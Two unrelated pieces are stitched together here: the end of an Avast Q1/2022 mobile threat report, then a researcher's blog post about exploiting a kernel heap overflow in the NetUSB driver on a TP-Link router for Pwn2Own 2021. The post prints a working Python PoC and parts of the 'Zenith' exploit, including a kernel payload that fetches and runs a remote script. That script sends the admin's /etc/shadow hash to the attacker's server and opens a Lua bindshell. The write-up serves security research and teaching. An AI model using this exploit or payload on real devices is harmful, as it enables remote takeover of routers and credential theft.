Adware comes in various configurations; one popular category is stealthy installation. Such apps share common features that make them difficult for the user to identify. Hiding their application's icon from the home screen is a common technique, and using blank application icons to mask their presence. The user may struggle to identify the source of the intrusive advertisements, especially if the applications have an in-built delay timer after which they display the ads. Another Adware tactic is to use in-app advertisements that are overly aggressive, sometimes to the extent that they make the original app’s intended functionality barely usable. This is common, especially in games, where timed ads are often shown after each completed level; frequently, the ad screen time greatly exceeds the time spent playing the game.

The Google Play Store has previously been used to distribute malware, but recently, actors behind these applications have changed tactics to use browser pop-up windows and notifications to spread the Adware. These are intended to trick users into downloading and installing the application, often disguised as games, ad blockers, or various utility tools. Therefore, we strongly recommend that users avoid installing applications from unknown sources and be on the lookout for malicious browser notifications.

According to our data, India, the Middle East, and South America are the most affected regions. But Adware is not strictly limited to these regions; it’s prevalent worldwide.

As can be seen from the graph below, Adware’s presence in the mobile sphere has remained dominant but relatively unchanged. Of course, there’s slight fluctuation during each quarter, but there have been no stand-out new strains of Adware as of late.

Bankers

In Q1/2022, some interesting shifts were observed in the banking malware category. With Cerberus/Alien and its clones still leading the scoreboard by far, the battle for second place has seen a jump, where Hydra replaced the previously significant threats posed by FluBot. Additionally, FluBot has been on the decline throughout Q1..

Different banker strains have been reported to use the same distribution channels and branding, which we can also confirm observing. Many banking threats now reuse the proven techniques of masquerading as delivery services, parcel tracking apps, or voicemail apps.

After the departure of FluBot from the scene, we observed an overall slight drop in the number of affected users, but this seems only to be returning to the numbers we’ve observed in the last year, just before FluBot took the stage.

Most targeted countries remain to be Turkey, Spain and Australia.

PremiumSMS/Subscription scams

While PremiumSMS/Subscription related threats may not be as prevalent as in the previous years, they are certainly not gone for good. As reported in the Q4/21 report, a new wave of premium subscription-related scams keeps popping up. Campaigns such as GriftHorse or UltimaSMS made their rounds last year, followed by yet another similar campaign dubbed DarkHerring

The main distribution channel for these seems to be Google Play, but they have also been observed being downloaded from alternative channels. Similar to before, this scam preys on the mobile operator’s subscription scheme, where an unsuspecting user is lured into giving out their phone number. The number is later used to register the victim to a premium subscription service. This can go undetected for a long time, causing the victim significant monetary loss due to the stealthiness of the subscription and hassle related to canceling such a subscription.

While the primary target of these campaigns seems to remain the same as in Q4/21 – targeting the Middle East, countries like Iraq, Jordan, but also Saudi Arabia, and Egypt – the scope has broadened and now includes various Asian countries as well – China, Malaysia and Vietnam amongst the riskiest ones.

As can be seen from the quarterly comparisons in the graph below, the spikes of activity of the respective campaigns are clear, with UltimaSMS and Grifthorse causing the spike in Q4/21. Darkherring is behind the Q1/22 spike.

Ransomware/Lockers

Ransomware apps and Lockers that target the Android ecosystem often attempt to ‘lock’ the user’s phone by disabling the navigation buttons and taking over the Android lock screen to prevent the user from interacting with the device and removing the malware. This is commonly accompanied by a ransom message requesting payment to the malware owner in exchange for unlocking the device.

Among the most prevalent Android Lockers seen in Q1/22 were Jisut, Pornlocker, and Congur. These are notorious for being difficult to remove and, in some cases, may require a factory reset of the phone. Some versions of lockers may even attempt to encrypt the user’s files; however, this is not frequently seen due to the complexity of encrypting files on Android devices.

The threat actors responsible for this malware generally rely on spreading through the use of third party app stores, game cheats, and adult content applications.

A common infection technique is to lure users through popular internet themes and topics – we strongly recommend that users avoid attempting to download game hacks and mods and ensure that they use reputable websites and official app stores.

In Q1/22, we’ve seen spikes in this category, mainly related to the Pornlocker family – apps masquerading as adult content providers – and were predominantly targeting users in Russia.

In the graph above, we can see the spike caused by the Pornlocker family in Q1/22.

Ondřej David, Malware Analysis Team Lead
Jakub Vávra, Malware Analyst

Acknowledgements / Credits

Malware researchers
  • Adolf Středa
  • Alexej Savčin
  • Anh Ho
  • David Álvarez
  • Igor Morgenstern
  • Jakub Křoustek
  • Jakub Vávra
  • Jan Holman
  • Jan Rubín
  • Ladislav Zezula
  • Luigino Camastra
  • Martin Chlumecký
  • Martin Hron
  • Ondřej David
  • Pavel Novák
  • Pavlína Kopecká
  • Samuel Sidor
  • Vladimir Martyanov
  • Vladimír Žalud
Data analysts
  • Pavol Plaskoň
Communications
  • Dave Matthews
  • Stefanie Smith

The post Avast Q1/2022 Threat Report appeared first on Avast Threat Labs.

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate to the contest and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, the hardware was easy and cheap to get so it felt like the right choice.

router targets

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two line of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new grounds to lower the chance of entering the competition with a duplicate and also maximize my chances at finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.

I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq

At first sight, the following processes looked interesting: - the uhttpd HTTP server, - the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?), - the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

One another thing I burned time on is to go through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched to recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed different 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -

Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker inputs is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
  if(result) {
    v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
    Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
    if(Payload_1) {
      // ...
      if(SoftwareBus_fillBuf(SbusConnection, Payload_1 + 2, v64[0]))

I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefuly, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  if(SbusConnection)
    if(Buffer) {
      if(BufferLen) {
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if ( GetLen <= 0 )
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if ( !BufferLen )
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      }
      else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  }
  else {
    // ...
    return 0;
  }
}

KTCP_get is basically a wrapper around ks_recv, which basically means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data I wanted. If you are interested to learn on how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
  # Version
  s.send(b'\x56\x04')
  # Send random data
  s.send(aes_ctx.encrypt(b'a' * 16))
  _ = s.recv(16)
  # Receive & send back the random numbers.
  challenge = s.recv(16)
  s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
  length = len(name)
  assert length - 1 < 63
  s.send(le32(length))
  b = name
  if type(name) == str:
    b = bytes(name, 'ascii')
  s.send(b)

def create_connection(target, port, name):
  second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target, port))
  aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
  send_handshake(s, aes_ctx)
  send_bus_name(s, name)
  return s, aes_ctx

def main():
  parser = argparse.ArgumentParser('Zenith PoC2')
  parser.add_argument('--target', required = True)
  args = parser.parse_args()
  s, _ = create_connection(args.target, netusb_port, 'PoC2')
  s.send(le8(0xff))
  s.send(le8(0x21))
  s.send(le32(0xff_ff_ff_ff))
  p = b'\xab' * (0x1_000 * 100)
  s.send(p)

Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into _get_free_pages which is part of the Linux kernel. _get_free_pages allocates 2**n number of pages, and is implemented using what is called, a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended-up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation. The only limitation was that I could only trigger a mallocPageBuf call with a size in the following interval: [0, 8] because of the integer overflow. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke _get_free_pages.

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);
  v2 = v1 < 257;
  v3 = v1 + 1;
  if(!v2) {
    v6[256] = 0;
    v3 = 257;
  }
  v5 = v3;
  kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
  return printk("<1>%s", v6);
}

Pretty funny right?

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspections wasn't going to work. What are my options?

Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement with my current situation. I would be able to hook-up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I end up with a bootable image that has a configuration as close as possible from the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
  const struct iw_handler_def * wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
  struct netdev_rx_queue  *_rx;

  /* Number of RX queues allocated at register_netdev() time */
  unsigned int    num_rx_queues;

  /* Number of RX queues currently active in device */
  unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number.  Assigned by driver.  This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};

Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where were mismatches. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

[email protected]:~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
[email protected]:~# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc   90 : run_telnetDBGDServer start
[   89.272000] kc  227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7    :Archer C7
[   89.272000] INFO17FB:  AUTH ISOC
[   89.272000] INFO17FC:  filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145:  init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC:  infomap 869c6e38
[   89.280000] INFO16EF:  sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
[email protected]:~# [   92.308000] INFO1572: Bind to eth0

For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones): - I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close from reproducing. - I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz. - You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets Andrey Konovalov describes in details an attack that looked like could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  switch (OpcodeMasked) {
    case 0x50:
        if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
          ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);
            AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
            if (!AllocatedBuffer) {
                return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
            }
  // ...
            if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close from my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d
addr_payload = 0x83c00000 + 0x10

# ...

def main(stdscr):
  # ...
  # Let's get to business.
  _3mb = 3 * 1_024 * 1_024
  payload_sprayer = SprayerThread(args.target, 'payload sprayer')
  payload_sprayer.set_length(_3mb)
  payload_sprayer.set_spray_content(payload)
  payload_sprayer.start()
  leaker.wait_for_one()
  sprayers.append(payload_sprayer)
  log(f'Payload placed @ {hex(addr_payload)}')
  y += 1

My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:

struct wait_queue_head {
  spinlock_t    lock;
  struct list_head  head;
};

struct wait_queue_entry {
  unsigned int    flags;
  void      *private;
  wait_queue_func_t func;
  struct list_head  entry;
};

This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
      int nr_exclusive, int wake_flags, void *key)
{
  wait_queue_t *curr, *next;

  list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
    unsigned flags = curr->flags;

    if (curr->func(curr, mode, wake_flags, key) &&
        (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
      break;
  }
}

This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00

(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff

(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.

(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
    prev = 0xbaadc0d1}}

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
    nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
    dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34

Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0

The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).

OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times about 5 I would say. Good enough.

